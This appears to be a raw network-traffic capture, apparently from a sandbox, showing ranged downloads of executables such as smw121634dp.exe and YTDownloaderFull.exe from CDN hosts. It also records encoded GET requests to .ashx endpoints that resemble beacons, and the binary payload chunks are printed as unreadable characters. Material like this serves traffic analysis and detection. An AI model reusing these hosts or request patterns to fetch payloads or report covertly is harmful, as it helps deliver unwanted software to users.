.....t...O..t .....u...3....3...F.....;5.7B.r._^[...U..QQ.U.SV..i.<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=500000-749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 09:28:55 GMT

Content-Range: bytes 500000-749999/3359008

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: OXZRMGMjm0F86g7FXr0j-eBbjchQctLXw3bdnty6KxoQ3Uhu4p2U0g==
G|....F...`#1.G.........Wk*..<......3~m._..y3.....t..=is..h._m.M8T.
i.K.._u..k.........AJ.v&-2H.......i..K......-.S.2G...-q..}..])f....ad.
j..f..EV.G.}g.NVBSR!~Ne3..."4........V...{g..i .k.....$v..z:..K......X
..;.j(..e.3....p...c).............qW}i.-....z!.S...]....a.=g_.n....yx.
n.y|.a.....\.uy........5.~.9I"E..V..R.3XX.[..W.<.XfGK.....`Q.q..|..
?.G..........7..M...U.-....YzK!....D'.*>...o.~G.b....j...X.=S. .l\v
.A..P..}.....h.d.g|..D:...L.ky...k..jL..o.(.e$|R..[.Y.....|...6*..;3.o
...w.i...x%..(]D!n...).bK.........<.! ..@.>.-SU.R/p."..M....o_.i
.u... d..{M]...,5j.<.'........O..L5.l.. S..G.0KD.q.B..^...Vk...}~..
.*C..^.q... .!....*0.._...f..j.?.....~ .m..(..]L.kK.......`..h..... ..
{......`.jR...$..LI.,.W...;.mp~2.3.[8mI...f..............K..B..y.?.yk.
..Mc..J..wX..;.f...V0.n..T$~...d..f3..;...X......t...=.......W.Q.._../
5.)..lF "../.e..=.F.0...C..... A.*u......hP.o.v.8.........9%....!..0J.
.ipJb|..e...I..,..N..9K..c...Sn......\4WA.k.#.....t. 1.}.H.......>.
......?.{............E%.D.....j.e....o......s.Z.....i"E.>....R...KO
...T.lht.(.vjqF...3.........}.Xg>.[....*...Uh.m|.........!5E./mP.cG
......Fb..q.=....6....A....6.R.......Lx....h. .f....fAS.....qdx.......
r.......q}[email protected]`..8.........H...Y-z....i.d...&D.B..ZG...z{.._m2
.....6<..0....KI."D..a)K....LU..v.@..=5|.<\2.e=[...2...L...6....
.!..../...W2..g..q$q.D&\*[email protected].
..?h2....!R:......6$...3N].....4.4...^5b..zwM"......Q.74..W..%{F.. @..
..3...][email protected];c{F.....%........K.,F!wL..ubT:..jl...IY...7.Q..f58.<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1000000-1249999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Wed, 09 Sep 2015 18:04:26 GMT

Age: 1

Content-Range: bytes 1000000-1249999/3359008

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: e_U86qhL1j0U7uN9NEIIqqlsV-RjMaocasCwarHVkwfsNKdZ5HGK8w==
[email protected]..........'..0.{.)U~...N.:?....T.t........SG'/.<..m
....:.K...._........\...C.v%.............d..xkD..p8%..].Q.....9.....N\
&h.D.q.....u.K.p..C..]DsO.....DnP|.?.o.%.........5k..M...9......E.,.6,
p.5..W.....i.t....HcH..?...6..jR.\....Od.....[...Jg..!....;....F....)~
..........W......*.;.t.....X7...a. :.uw/.S.E....c...`.jj._....D..x..93
.....j.......?.V.....C.=N...v......./....[..zN....g.].4G?y'^q..,.w...)
.z1...u..,[n?..p.f..k.....3CE..^.....6.........t.%e......Q]!.#.J.6.(..
N..X.#.2W.u#..Tvi......LA.F...hb...w%..dC.92..9a....~Y...*1.5jM....ZoS
........dR....1&-..~Cy.....^X.<ih..O>..4.......Y.P....L#...~....
..o.~..4k=..&G.G...[. F.... .w./..........^e.oW.Y)....:'.....c......lb
.TN.....[.h......S...x.6..(Ijbj...|F..K.......$e.j.z..4.5.H..........k
.J...8q..#....Y93g.......5TQ..8.$..:.P.k....H.i).9.S..U.H........CsCQd
.9f...........<...MW.(_.......{.k..i..1`..Mx_&.v.y>l^r.H.......o
. .&;;.W..F...6...1..^.=F..W..=.\.?l..^....4...j....D..'...8]..%Y`....
L6...c..U?..H\[email protected]<t[...S.[..J.k.-O.xv'.X^...%
.-M....`t}@.........?7b....>.p..1...p.u.7.,(.....D..M./.0.0.g.qU...
..3#..8.ye_.$....l.y...g......p........p{..J..7\..bF..<..zw...Mea.6
..|.>......r..........Vz!..@l8,..f][.........::*&..?...O....|?....2
>.M..o...E..%....2D...9$... 4Y...-..k.&..V...].v...o...l..k..|.2...
.6...-.%...;..<.-J.......l.]...b.P...^n....Y.}..fYK......9....("0..
D..;...(..h..Tv...._4.f....V;:D?..f......$..H.E....#..q....zvZY..q...s
......v..6...%[email protected][...kY..H.Vj...( .E..(.[V..K.`...t..9..qV...&<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=1500000-1749999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 1500000-1749999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: E_UlS9HfhRQmJjkHrbcZqxcvWwaSo-RfCAnRQ7M7OehAtyOojV9M5Q==
.;%[email protected],...:Ql.....6..Z....7..(y".X...
....r.....1X;....2B......;..Q.w.Y..T1....i.j...D<.}...]...4.....4{.
.C.\..>.8r....w|./....{.R....(EcW.p5?$.u.-T~u..x.....vL....'..C.jW.
H....S.........D4_U..{..P.{.^.g...)t.....%.Z.z..}..Q-...y.T...5}..Y..8
.CL....q..2. )D".J.....T".!<bITGCR......EI...#...].$.n..}q.#.t..3.F
.....:.I.0y.hV.V4...|aE.y..]Jn..7...<E$.L.?XS...si..az=...# t...w..
dkJ..|....9.>....l....yX..9.<.e......L.rC1....e.}<.~..bT..M.h
.FFuuF.a..?X....C..{....v..`..}.i..........`..{.:.G..._.$KS..vu.... "H
./..D...../..........C.....>...|1.kz....a..d.......@JE!...iR.v.....
`..h....|.......l......1..n...(I.......vLX.S..nN..<.......B.`Io.XR.
..[.Qs..Mp...'a......R..\.N..j..y.....3.H..P...^j....5..U.....P.o.X.jo
.......3..Zw....1............y/"...e.X.a...Q'^9m..Zm(D8...P...#E`..^).
."...Sm...N06..f.V......w...2......r.,..4....{.....<..y...7..i.....
[email protected]..&....rU.&...kC..#.._.t'r.6..i.......P...w..'0".Z...
7...D7M.Q.6.f#.......;.<1.=.D.q....o...7G.....R..%n...{..-_......@'
M.qV."n\,..7..N=V...)... .bY...........X...i.B.....;E..H'..P.UH".V...y
....{n...M....q.}.O...F5 .....E.F..../....z......8...X....X...b. :a._.
IG..,...k..{..."!v.a..p:..s.P..>[email protected]..}. *}
..4\..u8'..`....f:....qK..?.......3.#...&z.NM......>...}........6-/
.R<.I..t,.*2a.Ld<.s. ....r......`0..*..$.iWdu.X.dA...8......XD}.
..~uJ..`x.]S........_....%..D.o.w....y...n........O^..QH..%...PF...._.
..l.....W........u..U..1...e..z.'B22...7I...P.A.s.<.@...^.y...4<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2250000-2499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 2250000-2499999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: EVeV9sV1XXtA1lhXkH7lTD-GaC-D5jB3ghQdRf4hdVEiZKU_e-KDPw==
.g$.X.#..2.u&..r.Q-.......r.=..$....J.....1M.#uQ$..M.XCe..K9Jk].w\.:. 
...c.....\...........{.s.E}-o.|..KC{`..D.=.....5..S........ .c_-..yN.6
.U........4.....w....)=!.b........!.q...@.....;I.>.......7. j...n..
.cjD.cs..(.....D..........n....(.mc!..=......$.........a...CPaw,r.*...
.}.V..n...E..oW..l...b.....:o.7&.(............)...H...=.R......5..woY.
.O1..[.%1.}.. .Yq_....Q..Y.8.I.....)..WU23m....(iMJc.".8^.<.e.S.?.D
.6. ..m$K..a.....G....c.Y.......F.A.DuEP....<........x..P8.s$..0.J.
[email protected].$.|"...:..W...a....<...qq....S..,-.5O2"%-....Uah..2..
.....dJ..|Q....r..`C.,....Wp.]...S....tX;D....sP`B..]..0..Zq..SF.....&
lt;r.T.6(?..-..qK~j`...........at....{.^.....N..b....MO.M....t1..B...s
j".......Hrj.|..yj^.Fq?xJ...;..d...0h}<].R.0......p..k...w.a:.A....
{.z.AN.%?5.}...\*w|/=s....T...n.v.&...}.Z.sf0.u,Ls.....R.BS..v.$Ao$...
$.'.kh..)@....j?..2d..R....j3]x..js..nQ_EO.u..Vt..(..m.....[.0...=..xz
fa.._W.0!{.....9?..e&.....e..YB.jG<..q Fc.N..C%*......../...c..G.ab
.6.......U.C............^...vnm...8.....A..B.pF....SM......i9....7&./.
.Y.<.B...z.......|}.Y......c.M.].X...Us.ycX.....)....M}..~p....?...
.ci.....l,...<Xk..0...Q.......trr>V....P)....ci.Q.....w|rV..-g.*
&.w........>[email protected]..._(._:q..c..%..@....`.J1...N$v.W.3._?.L.
y.G....UE:...t.5..|...8}w@.....,v;a......?A...\j.>..u..kh].Rx7p....
.......&..&ic.....IAGcb[....$X..x....C....9.Ik...G%t.K6..%k!.}....zu..
..gZeS........1^X.oB....`?.a.)..k..m.b5........=J.p..Ci.....C..D(g9...
.d.......L.d.u1.. ."..x.Hakc......}h..rJ.Mm........._u6W~W.UOFS...<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=2750000-2999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 16:56:59 GMT

Content-Range: bytes 2750000-2999999/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: z-H82M_4G415sHNGiDi-VcYC2uBILm1UUnDfNdgawWQ-axGA3ynppQ==
..@Q... <.....&*[email protected]....&CJ?..,....\....j..~&P..,p..l1....ssI.
.`..b9....#....cu.....,..iWQ.....feG7..n.E,...yq..Nn....JUK..j......D.
......X.R...Q...mP.)...4.5.(....h.i...d..].c..#..q8?..K..i......,i...?
.q=...z.......w.u.#.....C1...4...O.8B..B.k...r.....G.......b..a.b4z..W
..:[email protected]#>v..P.5..8.....M.8.......p/.VZ........e}...o-R....8
Q.\...4{.3......,..{..a....R_.........B\.x..J..M...~.AB.n.#.... .....R
C..zFm...H..-.;....K.T.UR..9..=.%.6.).r0.lYw....)........y...3.......Y
...*.Gw..Z0.c......S....sX.mA.........Dt?...4....F.o4..5..V..B..5./.4.
5.)Z.7..8.m.K.a..u...$....x......p.....\.;..Qx.%.......&(q..........W 
.....1[...c.,....r.H....u..M..G.g...`..?x..<.w.YNe..]'.dWT'!...o...
..m.Kf......w.1.3 .HW;... .......{d....U .c.x...1...HS^.qc.t...]a,.<
;.TOs.Y._....d ... 2`[email protected].;..i[.1.!.'=.....q..X
z.iQ.U>.....cTr...dz...8..PK.....9.`....Qug=.0P3.~..ksUg0.....S_m..
>..6q0}.b..@<-U....{..m<........X]|..n..&.....z.~..kE..9Yy...
N..)h...{...>......F.! .:........e..|..0[H*.....R..9.W.,4(..ojz3...
q5Z........}.]...........r.......y........8........^.&.....d..1.!..u..
...... ...L.V\{. .T..6.]./......$G.Xz..](...g..U....j7.s..!..c....fHv.
..M.Rx.....G,%Z~.t.$.R..;....K..T?.:...R.'.W.z...e.... ...d.G...?k...2
......&.g..q.~....W.....yBH..]d*."..`.....>...H.."E ......p..I7...&
....[u...I;K..n..H........[}.G-d....(..4...w.#....K5..5...~HX..L) 5@`.
!^pi....z}..!*&.......=......7:h.Jv=D[...c7.5^E%.....n..adV....0i|..^}
!;..b..........'.3.......|. . .G.a.. M.....p.}.| z;).$....y..v.x0p<<< skipped >>>

GET /smw121634dp.exe HTTP/1.1

Range: bytes=3250000-3359007

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d13s98z2lzti92.cloudfront.net

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Content-Type: application/octet-stream

Content-Length: 109008

Connection: keep-alive

Cache-Control: public, max-age=3600, s-maxage=3600

Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT

Accept-Ranges: bytes

ETag: "44deb3125cb9d01:0"

Server: Microsoft-IIS/7.5

X-Powered-By: ASP.NET

Date: Mon, 07 Sep 2015 17:05:21 GMT

Content-Range: bytes 3250000-3359007/3359008

Age: 1

X-Cache: Hit from cloudfront

Via: 1.1 6a9941488f8c4d7cfc9d159decc6f1d1.cloudfront.net (CloudFront)

X-Amz-Cf-Id: 54hvbuWWzoLO70b6d7Z6lWGDdm0P7uJPGfEFN5w2Why4Mzv6mYLt3A==
~....wR0sx.D..iw..z-..g.....%/....U|..s....xN.hD.'E....DvG....'O..m..b
I%.m..... e$ozE.\..........&.....J...M....6....."...U...v...z8v.3..N..
..\..isE..9...Q........'..o1"..-?..Uj....9..K.@:............z6:.[: n..
.%...i..U..-..x..........u...3.T.u<..k......a..q...A.=[..@?*r......
...K'.9.g..GU..5.}tSH.......\.......|..!r.L........?.o....k...e.4...AF
h..l"=......S..f:, 7...>z,...6..C..,.XD.`...2....x49gD.=......KU..u
..v../...'...D?.....w.4...U.Nz.$.....v..@K.......".g...&.....wCP=.W.6z
.[.........8AM...O.'...E. [email protected]&.I`...J..&(.*}a.X.-..G6.c^....m...T
W).=Qf..[....X!.nn.......X......l.....D...{q...%!,.....).L:E..b^.b.5..
..A...qU... k.....A..A..%.i...x..'........Wm.....=-.?..2s......1g&].Z.
n...T.q...z.[....C...SUQ...\..?....%D.........-./d.(.....;...2........
..x.%/..ECi%.:...4.T},1rf....... {O.B.<..... ]}.....Z...."...=....&
gt;.^.`u...g....}..].w....U.M......C.iH....~ .VQ.g#.15.Cg....G.k...|. 
C..H$.)..a...V)...*....X75NiO... ...H]....;....8...@L>....O... 1M..
...............yhG..F..=}.....1....W...A1..\.J ...x..O..(. .....'..t..
B2.m>gKp`.N`..F/..CrB8.E.^.;..h!.9.O.....m..,n..;'P..v..U...ww.R...
.$^iG...]E...ZF7A..h)'[email protected]).....|....V.J.,.H...4.X.ks.....
e.N.[......IQ.@...)...w...4.W........".e.].....8........t..#..........
giJeZ.......E..Ow..k...X......^G#b.=.w..x.2.t..................x.oKM..
d....K..UJb~...X.y..]....u.. ....V6..8.(7.........<....S......P!.A.
;.Jk......Dl^3...3.......S.v.o)j...........9...Ja\.'W.8...;#..]R...V.3
.vz..M)G.?.....X...r4........_.....5.B.B.._I.d.{..rJ ~.T...\.o....<<< skipped >>>

GET /p.ashx?e=I6hFHi0H7G9mS6nlSU/NTuiRTIWym4 0QVpVqTl5/e4gLxC0aXqYrfauHCM4PoUS28zA03xwxN7DRdbCExQ3XkCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mdulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hfCt1Zpc0u8z HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: d1y2jryd6u59ns.cloudfront.net


HTTP/1.1 200 OK

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

Server: Microsoft-IIS/8.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Thu, 10 Sep 2015 07:25:50 GMT

X-Cache: Miss from cloudfront

Via: 1.1 e89c67951b2bc58773e3664c08702f34.cloudfront.net (CloudFront)

X-Amz-Cf-Id: _pl_j-7mThaJDdigSOJIXkzCS6pnbJ68V3HiOpm5h8XxFa--G-6rIA==

HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Thu, 10 Sep 2015 07:25:50 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 e89c67951b2bc58773e3664c08702f
34.cloudfront.net (CloudFront)..X-Amz-Cf-Id: _pl_j-7mThaJDdigSOJIXkzCS
6pnbJ68V3HiOpm5h8XxFa--G-6rIA==..

GET /14314.ashx?e=/TVH52TeC6QinMwQKODRlGRUqvu659HFIM0CqmsRfbs08bEgFRb3JLee7JGyVH1lRdb/S8YKHkPcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HpS5W6ywluOr7GRIcOoydhUdGPD1b2Qs4hf6pZ97v1E3PTyAJF5AGGDDbltvqAzQCw6kHnR XV4QBZGQjpShx/0JQd5HxgIXcFljvsbds7FP1MD0RZMJTghpRaG5UbXNBLHocoDBHKKK/1bjUefs49JU1ySiay1sqdymVuPyjsZ40oQa07NiSGHSvtnkZb9H9Fc ZH5YnXW9iHRMVKaBRE8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWMc5pB8b49iEV3IK/IMAo6EcW/Ds9zcpL4qcbOV8TZlZQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:51 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:51 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......

GET /14314.ashx?e=hNMAVKhukrzd/jwMCMorqnRyfx22RDGQs1FW/TpGzIP UINFgbXOioSHumzRJDsRjOluN4MfK82okOeVQ5E0okWABgPsiU45Kn4tgsNywXo52WjLgSDCxhB4JTca9qTJ6tXJoxLUCgFVyxmCM5MsGKDVUCx/QWZiGGOhdsvITwVAbULHJpnG/4XOg23g5 yPOzV4mKJhjCiOBvq/txek z4HsrR8MHCWlUGZM/ipg 4PIAIQtwrEX1/kTVIpb8Jsqp9Xc7DttahTvMZjEVVmTm 4 SQMoieQ8Lxp8HLogowR591rTzu05D5OeSwUDdva2hNibsqR5hVlUrzhzYzRp7 srzHUOTm5Cd3FHp 6lvDMpb3phhqpJJEKkB5GbhZH HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

....

GET /14314.ashx?e=c2mW1WEUbCFmS6nlSU/NTmTSvfLK6KnR/ToTRiVFxVR2M5d6UDxIvpDKf9AB8lI7SlCyq068/M1FOTAwlw8YF8d71y2H I42iBFaADrPTvGxo tMAskzj3wF8xC533Fc8E2Pd9CMWosSO5u5UlyZGWbY4wRb3lZ/U7MEatNnCEgXCfGg4gcTppNB3Tmp8 xhs IILilpWF0OiEhuPxDpVu4qmcipTkY2jZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVTSD2kW7/bUhOsZSXdIe/4HdZh88XBqEFw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)

Host: 1dfgnb-mzxspesu.netdna-ssl.com


HTTP/1.1 200 OK

Date: Thu, 10 Sep 2015 07:25:53 GMT

Content-Length: 0

Connection: keep-alive

Cache-Control: private, no-store

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Server: NetDNA-cache/2.2

X-Cache: MISS

HTTP/1.1 200 OK..Date: Thu, 10 Sep 2015 07:25:53 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=250000-499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 250000-499999/5107690
......Qr.Q...~..Q.~.....V...b..u......q..v..~=:.LsZ.-..#.O..[.~l.vP...
.O.....r...rX....9*......o.*.....J.......[...<z..'...I.....a.v6...a
.>9)...G.3G...90.......#..C. .H.O..m..?e.......}.C..yl.....$.....T.
.D..y.0.L...(.....j.V.I....>..#E6....=;o....a..].y.-.m.?S....o.\~..
36.C..g(./..."...:...d`zWi.p....:..._..e.....A..I\H Q.h...)X%rA."f(. .
..j...........{..M.....w....O...M]k....:.L..U.X.[.?..R.K<j....5X.S;
.......m[..CO..`..KRH......8.......ww.t...p../...Q".~.<.~..2.W*.%%.
u....[..<%2....7....t..d.C`.~ P_.. m.R.........7`LT...Muw.^.....O..
*. [):T.'...`..>.>w.1......OE....Y2V#......&..... *...W..V..I...
Am..b$..|y.. ...W...%.~I..d..UO&.....`.?2.............38{.....4.$D~.4|
.Y..A}..qFa.>...,..d..M(bG.....f.Ya............~t.....g... {.}...CH
H..........4]2I~.-p.T..\.1..m._.xV.n$.(b\.........sx........c....z#..[
...^...qPj0].....a.T1.....&....-..K..`/.'.s..2Hv..DA'Xl..."...-..  ..b
..9u.3.o.E3..J4...N.wS&....'.......5..5....... ...e.P....S.....f....".
[email protected]~D........p..p{8...=.c..]..-.`...?..<hV..B
..z..M.^.....sr....Ru..[U..?.F$.9.\@...}Q.......0.5..(~..$\vg....&...(
....o<[email protected][email protected].|N...."
...npr.T..=........u............'.M.3....m.c.!.EM.ww.....Jl1F)Cam....N
...Vg.......7...6..&.d/p.;...o0.......}..M....=.IV..v}........T.......
....z&B.D.... ..`.-...H.A#..O.H.kwZA,......{....H0.. n:.[M.@'&1.....e]
......u..a L.....".....=kOu..pB.F....P.@.}..Z}..]....0l..eo.~.*q>.N
.....uG...pTP6...._..D..VJ....".;..z.h[.;....3..$.)H~j.H).....Fv.&<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=750000-999999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 750000-999999/5107690
..!t.b..V%QKT..n.J.2........D....v.....`.dB.........#...../.<.y...l
./.....cqN...T.....s.6..T..xo.....kik1..4S.Ay..&..........E//e.....=.z
#..........H..>....o.0....B..cr<......[....18[qp......i.5[p;.&p.
&......a.v8......hZ.....f...........C.8.S..s.!:`.6cV..I=...).h:...v...
..N.e.....y!.G.lC4...#.'.....|,....."..p.Y.&...._^i...._ ....F....m...
.LO......8.......[.>.j. [email protected]....%........m.G.R.>p.X.P1(7F..i.
..8..:....l.64..LMHZ....b<._.{......,......Tf.:]... ..k..*.......&l
t;..tL.(V...>....B[.}....kM.V...2US..s\.......Y...2.....B.?. .=....
\...X)..F..4.'.)F.O...h&. ....)v...P..G.... g_.Y.Z(c..................
m..,....'L .(....R.....]LQ.eye8.. ..D...".h .\.FW*ZX..P..%....G..#....
.8.r.^.c../..[tm......8l...Qs........?_...tw7j..M.PQ9,5."...=.......&l
t;.2s.\I.P.l...._.G...k`...X....D.*.b.........G='..)....R..8...X7.1g..
[email protected]'......{&.C..J.".8@ ...^..D......>!L.........3.%i..b
*.........32....i.c..l.|D.^.%(.Uv.:....o2.....o$4.>`~.x..|.C.......
..}.Eo...b.Q'..zK..J>[email protected])..S|.i.e...r].y...70r..3k........T]
..KBt...................R...[...R....8.....Yl>/.[m.7F...../<.X}'
............['....R.lI ..;.,R^..*.....=p.P.....~W...L.*v.Z..^.8v-.]...
{.k.5.}.>'...J...k..i....cf.4.[K../.q.N.|Q.._.`:.c...HP.p..5jUE....
:...U6'..1'.<.u.......8.Q.o.<e%..0oX%..7.U....W....&.e...g.F....
...XG..@0t\%e...2MN.....a.*p.u...........>..*[.TL... ......o.RZxP..
.D.o}....-...a..8.%.O./ET.7}8...^..Lta.F.7.............5.v.%"..1.a..B.
:.1 ......H..@$.....^l.A1..Y.......u...(.".NZc.4 L:w...>..!]~9n<<< skipped >>>

GET /YTDownloaderFull.exe HTTP/1.1

Range: bytes=1250000-1499999

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: otr4vhc-1ghhyl1c.netdna-ssl.com

Connection: Keep-Alive


HTTP/1.1 206 Partial Content

Date: Thu, 10 Sep 2015 07:25:42 GMT

Content-Type: application/octet-stream

Content-Length: 250000

Connection: keep-alive

x-amz-id-2: rn0VRtdeG9nkrztNNzmx8YG8CG7ulaNReolj026ah6zwbyRI8wwaZog4JLF9ttcv

x-amz-request-id: A7561DB98695E903

Last-Modified: Wed, 09 Sep 2015 09:54:13 GMT

ETag: "5d669deb08c6a6c70fd2bc96b3af38ac"

Server: NetDNA-cache/2.2

X-Cache: HIT

Content-Range: bytes 1250000-1499999/5107690
.....N...L..S..q..&.0.N..........g. .....`K. .=.....K6u...i.....9.a...
..]J.....;....U......Y.. ].U.'..3.=..`..:Q...5;..... z..<S...XM.y..
...Pw.m..........?.(...Vjc....#C.w.....ef.{."k.!biQ.g..M...fL9@.......
m.)....UaM.../~:(....l.....r.b.D..(...G..u.SM.^sP..F.b.q8.y.O.6.....;.
].`S"&...m...a.....(...%.$1n......`.d...s.b../.:..9g.D.}P...........P.
h..........S.|....},fSq/.?..6.t..W.M..?...".1..a..8.tO{.4.....ZR./..0%
....P(.'&.?......./N..,./......o...~......c.....l#..X.....G..N.Z.Xc L=
....Dj...T...jz..............bN^.1.w...S...#.].}...C.5V=.[...qT.^.5...
R...Y.B&......$(.'[email protected];'.bu.}u....$.h
.g..Y...2.~...ng...8..........M.*.......D%[email protected]:........R.K...1..
..aQ`).......LbX.Dq.w,...,.hm.M.m...xf .......I.\...!F.ey.h6..PT.%,2..
..V(.wt..=.........T...5W...1.. L.....:y./.,.j!......f1.....%.....'...
